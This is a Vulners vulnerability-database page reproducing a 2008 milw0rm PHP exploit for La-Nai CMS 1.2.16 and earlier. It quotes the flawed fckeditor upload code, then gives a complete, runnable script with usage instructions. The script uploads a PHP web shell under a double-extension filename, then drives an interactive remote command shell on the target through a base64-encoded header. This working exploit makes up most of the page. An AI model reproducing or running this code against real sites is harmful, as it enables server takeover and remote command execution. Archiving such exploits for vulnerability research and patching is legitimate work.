Vulners
Lucene search
La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
<?php
/*
--------------------------------------------------------------
La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://sourceforge.net/projects/la-nai/
[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
104. }
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nlanai-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-14]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 May 2008 00:00Current
7.1High risk
Vulners AI Score7.1